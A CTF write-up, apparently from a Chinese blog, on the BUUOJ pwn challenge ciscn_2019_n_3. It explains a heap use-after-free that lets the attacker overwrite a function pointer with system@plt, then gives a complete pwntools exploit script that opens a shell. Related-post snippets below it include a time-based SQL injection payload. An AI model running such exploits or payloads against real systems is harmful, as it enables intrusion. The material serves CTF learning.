[BUUOJ] ciscn_2019_n_3

最新推荐文章于 2022-03-15 13:59:18 发布
最新推荐文章于 2022-03-15 13:59:18 发布
阅读量1.8k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BUU OJ pwn 文章标签: pwn BUUOJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41706924/article/details/102250897
本文详细解析了UAF(Use After Free)漏洞的原理与利用方式,通过实例展示了如何利用fastbin机制控制堆块,修改free指针指向system@plt实现getshell。文章提供了完整的exp代码,适用于信息安全领域的学习与研究。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里写自定义目录标题

漏洞点

可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞:
ALT

漏洞利用

由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。
我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指针指向system@plt,可以getshell

#0号堆块 (string)0xc 0x38
#1号堆块(int) 0xc
我们释放0和1号堆块,再申请0xc大小的string的堆块
#2号堆块 (string) 0xc 0xc
此时原本0号堆块的存放print和free指针的堆块已经可以被我们修改,直接修改为“dash”加system的地址。之所以在前面加dash是因为我们会多输入一个‘\x0a’即换行符导致指针会指向dash处。

exp

from pwn import *

p = process("./ciscn_2019_n_3")
context.log_level = 'debug'
context.arch = 'x86'
rmt = "node2.buuoj.cn.wetolink.com"
port = 28717
p = remote(rmt,port)
elf = ELF("ciscn_2019_n_3")
def newnote(idx,type,value,length=0):
    p.recvuntil("CNote > ")
    p.sendline(str(1))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
    p.recvuntil("Type > ")
    p.sendline(str(type))
    if type == 1:
        p.recvuntil("Value > ")
        p.sendline(str(value))
    else:
            p.recvuntil("Length > ")
            p.sendline(str(length))
            p.recvuntil("Value > ")
            if length == 8:
                p.send(value)
            else:
                p.sendline(value)
def delnote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(2))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
def shownote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(3))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
if __name__ == "__main__":
    newnote(0,2,'a'*10,0x88)
    newnote(1,2,'a'*10,0x38)
    #gdb.attach(p)
    newnote(2,1,0x41)
    #newnote(2,2,'b'*10,0x38)
    delnote(1)
    delnote(2)
    newnote(3,2,'bash'+p32(elf.plt['system']),0xc)
    #gdb.attach(p)
    newnote(4,2,"/bin/sh\x00",0x38)
    delnote(1)

    p.interactive()
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 926
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
buuctf之ciscn_2019_c_1
weixin_54452942的博客
04-18 897
通俗易懂
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.youkuaiyun.com/A951860555/article/details/111991072
ciscn_2019_ne_3
seaaseesa的博客
05-07 485
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
ciscn_2019_n_3 writeup
SkYe's Blog
10-24 656
基本情况 这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。 程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下: struct int_chunk { void *rec_int_print(); void *rec_int_free();
ciscn_2019_en_3
fayinq的博客
03-14 560
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 685
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4729
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 304
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3223
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
buuoj刷题记录 - ciscn_2019_n_3 1
qq_34010404的博客
03-15 503
查看程序保护: IDA分析程序,可以发现程序存在UAF漏洞: 只要使某一个Node的数据区域和已经free的Node的12个字节相重合,就可以修改函数地址. 只需要这样构造即可: 释放掉Node1,Node0,然后add一个 content为12字节的Node.就可以修改Node1的前12个字节. 1.可以修改Note1的前四个字节为 ‘sh\x00\x00’,后四个改为system.plt 2.可以修改Node1前四个字节为system.plt 的下一条指令地址(直接jmp由于该指令的地址低字节为
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 1130
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
buuoj ez_sql
最新发布
03-22
这涉及到构建能使服务器响应变慢(取决于特定条件下触发sleep函数)的payloads, 如 `IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),0)` 来判断MySQL版本号的第一个数字是否为5[^3]。 以下是Python脚本的一个简单例子用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值